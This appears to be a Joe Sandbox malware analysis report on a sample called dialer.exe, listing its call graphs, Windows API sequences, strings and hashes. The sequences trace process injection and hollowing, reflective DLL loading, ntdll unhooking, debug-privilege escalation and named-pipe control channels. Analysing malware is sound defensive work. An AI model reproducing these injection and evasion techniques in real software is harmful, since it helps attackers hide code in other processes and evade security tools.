                                                              • Opcode ID: 468899d511a3580b8016a16ee82124799021391b29db4fe74c236ec62e562d6c
                                                              • Instruction ID: 239ace28db30927a1bd5b1008f8730c317be793e27ed34d0f15ba748288e156f
                                                              • Opcode Fuzzy Hash: 468899d511a3580b8016a16ee82124799021391b29db4fe74c236ec62e562d6c
                                                              • Instruction Fuzzy Hash: 22B01230E043C9C4E3002F01E8423A836706B4C747F40D030C54CC3792CE7D58404B10

                                                              Execution Graph

                                                              Execution Coverage:46.1%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:67%
                                                              Total number of Nodes:227
                                                              Total number of Limit Nodes:24
                                                              execution_graph 522 140002524 523 140002531 522->523 524 140002539 522->524 525 1400010c0 30 API calls 523->525 525->524 383 140002bf8 384 140002c05 383->384 386 140002c25 ConnectNamedPipe 384->386 387 140002c1a Sleep 384->387 393 140001b54 AllocateAndInitializeSid 384->393 388 140002c83 Sleep 386->388 389 140002c34 ReadFile 386->389 387->384 391 140002c8e DisconnectNamedPipe 388->391 390 140002c57 WriteFile 389->390 389->391 390->391 391->386 394 140001bb1 SetEntriesInAclW 393->394 395 140001c6f 393->395 394->395 396 140001bf5 LocalAlloc 394->396 395->384 396->395 397 140001c09 InitializeSecurityDescriptor 396->397 397->395 398 140001c19 SetSecurityDescriptorDacl 397->398 398->395 399 140001c30 CreateNamedPipeW 398->399 399->395 400 140002258 403 14000226c 400->403 427 140001f2c 403->427 406 140001f2c 14 API calls 407 14000228f GetCurrentProcessId OpenProcess 406->407 408 140002321 FindResourceExA 407->408 409 1400022af OpenProcessToken 407->409 412 140002341 SizeofResource 408->412 413 140002261 ExitProcess 408->413 410 1400022c3 LookupPrivilegeValueW 409->410 411 140002318 CloseHandle 409->411 410->411 414 1400022da AdjustTokenPrivileges 410->414 411->408 412->413 415 14000235a LoadResource 412->415 414->411 416 140002312 GetLastError 414->416 415->413 417 14000236e LockResource GetCurrentProcessId 415->417 416->411 441 1400017ec GetProcessHeap HeapAlloc 417->441 419 14000238b RegCreateKeyExW 420 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 419->420 421 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 419->421 422 14000250f SleepEx 420->422 423 1400023f4 RegSetKeySecurity LocalFree 421->423 424 14000240e RegCreateKeyExW 421->424 422->422 423->424 425 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 424->425 426 14000247f RegCloseKey 424->426 425->426 426->420 428 140001f35 StrCpyW StrCatW GetModuleHandleW 427->428 429 1400020ff 427->429 428->429 430 140001f86 GetCurrentProcess K32GetModuleInformation 428->430 429->406 431 1400020f6 FreeLibrary 430->431 432 140001fb6 CreateFileW 430->432 431->429 432->431 433 140001feb CreateFileMappingW 432->433 434 140002014 MapViewOfFile 433->434 435 1400020ed CloseHandle 433->435 436 1400020e4 CloseHandle 434->436 437 140002037 434->437 435->431 436->435 437->436 438 140002050 lstrcmpiA 437->438 440 14000208e 437->440 438->437 439 140002090 VirtualProtect VirtualProtect 438->439 439->436 440->436 447 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 441->447 443 140001885 GetProcessHeap HeapFree 444 140001830 444->443 445 140001851 OpenProcess 444->445 445->444 446 140001867 TerminateProcess CloseHandle 445->446 446->444 448 140001565 447->448 449 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 447->449 448->449 450 14000157a OpenProcess 448->450 452 14000161a CloseHandle 448->452 453 1400015c9 ReadProcessMemory 448->453 449->444 450->448 451 140001597 K32EnumProcessModules 450->451 451->448 451->452 452->448 453->448 454 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 455 140002b8e K32EnumProcesses 454->455 456 140002beb Sleep 455->456 458 140002ba3 455->458 456->455 457 140002bdc 457->456 458->457 460 140002540 458->460 461 140002558 460->461 462 14000254d 460->462 461->458 464 1400010c0 462->464 502 1400018ac OpenProcess 464->502 467 1400014ba 467->461 468 140001122 OpenProcess 468->467 469 14000113e OpenProcess 468->469 470 140001161 K32GetModuleFileNameExW 469->470 471 1400011fd NtQueryInformationProcess 469->471 472 1400011aa CloseHandle 470->472 473 14000117a PathFindFileNameW lstrlenW 470->473 474 1400014b1 CloseHandle 471->474 475 140001224 471->475 472->471 477 1400011b8 472->477 473->472 476 140001197 StrCpyW 473->476 474->467 475->474 478 140001230 OpenProcessToken 475->478 476->472 477->471 479 1400011d8 StrCmpIW 477->479 478->474 480 14000124e GetTokenInformation 478->480 479->474 479->477 481 1400012f1 480->481 482 140001276 GetLastError 480->482 483 1400012f8 CloseHandle 481->483 482->481 484 140001281 LocalAlloc 482->484 483->474 489 14000130c 483->489 484->481 485 140001297 GetTokenInformation 484->485 486 1400012df 485->486 487 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 485->487 488 1400012e6 LocalFree 486->488 487->488 488->483 489->474 490 14000139b StrStrA 489->490 491 1400013c3 489->491 490->489 492 1400013c8 490->492 491->474 492->474 493 1400013f3 VirtualAllocEx 492->493 493->474 494 140001420 WriteProcessMemory 493->494 494->474 495 14000143b 494->495 507 14000211c 495->507 497 14000145b 497->474 498 140001478 WaitForSingleObject 497->498 501 140001471 CloseHandle 497->501 500 140001487 GetExitCodeThread 498->500 498->501 500->501 501->474 503 14000110e 502->503 504 1400018d8 IsWow64Process 502->504 503->467 503->468 505 1400018f8 CloseHandle 504->505 506 1400018ea 504->506 505->503 506->505 510 140001914 GetModuleHandleA 507->510 511 140001934 GetProcAddress 510->511 512 14000193d 510->512 511->512 513 1400021d0 514 1400021dd 513->514 515 140001b54 6 API calls 514->515 516 1400021f2 Sleep 514->516 517 1400021fd ConnectNamedPipe 514->517 515->514 516->514 518 140002241 Sleep 517->518 519 14000220c ReadFile 517->519 520 14000224c DisconnectNamedPipe 518->520 519->520 521 14000222f 519->521 520->517 521->520 526 140002560 527 140002592 526->527 528 14000273a 526->528 529 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 527->529 530 140002598 527->530 531 140002748 528->531 532 14000297e ReadFile 528->532 533 140002633 529->533 535 140002704 529->535 536 1400025a5 530->536 537 1400026bd ExitProcess 530->537 538 140002751 531->538 539 140002974 531->539 532->533 534 1400029a8 532->534 534->533 547 1400018ac 3 API calls 534->547 535->533 549 1400010c0 30 API calls 535->549 543 1400025ae 536->543 544 140002660 RegOpenKeyExW 536->544 540 140002919 538->540 541 14000275c 538->541 542 14000175c 22 API calls 539->542 548 140001944 ReadFile 540->548 545 140002761 541->545 546 14000279d 541->546 542->533 543->533 559 1400025cb ReadFile 543->559 550 1400026a1 544->550 551 14000268d RegDeleteValueW 544->551 545->533 608 14000217c 545->608 611 140001944 546->611 552 1400029c7 547->552 554 140002928 548->554 549->535 595 1400019c4 SysAllocString SysAllocString CoInitializeEx 550->595 551->550 552->533 563 1400029db GetProcessHeap HeapAlloc 552->563 564 140002638 552->564 554->533 566 140001944 ReadFile 554->566 558 1400026a6 603 14000175c GetProcessHeap HeapAlloc 558->603 559->533 561 1400025f5 559->561 561->533 573 1400018ac 3 API calls 561->573 569 1400014d8 13 API calls 563->569 575 140002a90 4 API calls 564->575 565 1400027b4 ReadFile 565->533 570 1400027dc 565->570 571 14000293f 566->571 586 140002a14 569->586 570->533 576 1400027e9 GetProcessHeap HeapAlloc ReadFile 570->576 571->533 577 140002947 ShellExecuteW 571->577 579 140002614 573->579 575->533 581 14000290b GetProcessHeap 576->581 582 14000282d 576->582 577->533 579->533 579->564 585 140002624 579->585 580 140002a49 GetProcessHeap 583 140002a52 HeapFree 580->583 581->583 582->581 587 140002881 lstrlenW GetProcessHeap HeapAlloc 582->587 588 14000285e 582->588 583->533 589 1400010c0 30 API calls 585->589 586->580 635 1400016cc 586->635 629 140002a90 CreateFileW 587->629 588->581 615 140001c88 588->615 589->533 596 140001a11 CoInitializeSecurity 595->596 597 140001b2c SysFreeString SysFreeString 595->597 598 140001a59 CoCreateInstance 596->598 599 140001a4d 596->599 597->558 600 140001b26 CoUninitialize 598->600 601 140001a88 VariantInit 598->601 599->598 599->600 600->597 602 140001ade 601->602 602->600 604 1400014d8 13 API calls 603->604 606 14000179a 604->606 605 1400017c8 GetProcessHeap HeapFree 606->605 607 1400016cc 5 API calls 606->607 607->606 609 140001914 2 API calls 608->609 610 140002191 609->610 612 140001968 ReadFile 611->612 613 14000198b 612->613 614 1400019a5 612->614 613->612 613->614 614->533 614->565 616 140001cbb 615->616 617 140001cce CreateProcessW 616->617 619 140001e97 616->619 621 140001e62 OpenProcess 616->621 623 140001dd2 VirtualAlloc 616->623 625 140001d8c WriteProcessMemory 616->625 617->616 618 140001d2b VirtualAllocEx 617->618 618->616 620 140001d60 WriteProcessMemory 618->620 619->581 620->616 621->616 622 140001e78 TerminateProcess 621->622 622->616 623->616 624 140001df1 GetThreadContext 623->624 624->616 626 140001e09 WriteProcessMemory 624->626 625->616 626->616 627 140001e30 SetThreadContext 626->627 627->616 628 140001e4e ResumeThread 627->628 628->616 628->619 630 1400028f7 GetProcessHeap HeapFree 629->630 631 140002ada WriteFile 629->631 630->581 632 140002b1c CloseHandle 631->632 633 140002afe 631->633 632->630 633->632 634 140002b02 WriteFile 633->634 634->632 636 140001745 635->636 637 1400016eb OpenProcess 635->637 636->580 637->636 638 140001703 637->638 639 14000211c 2 API calls 638->639 640 140001723 639->640 641 14000173c CloseHandle 640->641 642 140001731 CloseHandle 640->642 641->636 642->641

                                                              Callgraph

                                                              Executed Functions

                                                              Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                              • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                              • API String ID: 4177739653-1130149537
                                                              • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                              • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                              • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                              • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                              Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                              • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                              • API String ID: 2561231171-3753927220
                                                              • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                              • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                              • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                              • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                              Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                              • String ID:
                                                              • API String ID: 4084875642-0
                                                              • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                              • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                              • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                              • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                              Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                              • String ID:
                                                              • API String ID: 3197395349-0
                                                              • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                              • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                              • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                              • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                              Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                              • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                                • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                              • OpenProcess.KERNEL32 ref: 0000000140001859
                                                              • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                              • CloseHandle.KERNEL32 ref: 0000000140001875
                                                              • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                              • String ID:
                                                              • API String ID: 1323846700-0
                                                              • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                              • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                              • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                              • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                              Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                              • String ID: .text$C:\Windows\System32\
                                                              • API String ID: 2721474350-832442975
                                                              • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                              • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                              • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                              • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                              Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                              • String ID: M$\\.\pipe\dialerchildproc64
                                                              • API String ID: 2203880229-3489460547
                                                              • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                              • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                              • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                              • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                              Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 128 1400021d0-1400021da 129 1400021dd-1400021f0 call 140001b54 128->129 132 1400021f2-1400021fb Sleep 129->132 133 1400021fd-14000220a ConnectNamedPipe 129->133 132->129 134 140002241-140002246 Sleep 133->134 135 14000220c-14000222d ReadFile 133->135 136 14000224c-140002255 DisconnectNamedPipe 134->136 135->136 137 14000222f-140002234 135->137 136->133 137->136 138 140002236-14000223f 137->138 138->136
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                              • String ID: \\.\pipe\dialercontrol_redirect64
                                                              • API String ID: 2071455217-3440882674
                                                              • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                              • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                              • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                              • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                              Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 148 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 149 140002b8e-140002ba1 K32EnumProcesses 148->149 150 140002ba3-140002bb2 149->150 151 140002beb-140002bf4 Sleep 149->151 152 140002bb4-140002bb8 150->152 153 140002bdc-140002be7 150->153 151->149 154 140002bba 152->154 155 140002bcb-140002bce call 140002540 152->155 153->151 156 140002bbe-140002bc3 154->156 159 140002bd2 155->159 157 140002bc5-140002bc9 156->157 158 140002bd6-140002bda 156->158 157->155 157->156 158->152 158->153 159->158
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                              • String ID:
                                                              • API String ID: 3676546796-0
                                                              • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                              • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                              • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                              • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                              Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 172 1400018ac-1400018d6 OpenProcess 173 140001901-140001912 172->173 174 1400018d8-1400018e8 IsWow64Process 172->174 175 1400018f8-1400018fb CloseHandle 174->175 176 1400018ea-1400018f3 174->176 175->173 176->175
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseHandleOpenWow64
                                                              • String ID:
                                                              • API String ID: 10462204-0
                                                              • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                              • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                              • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
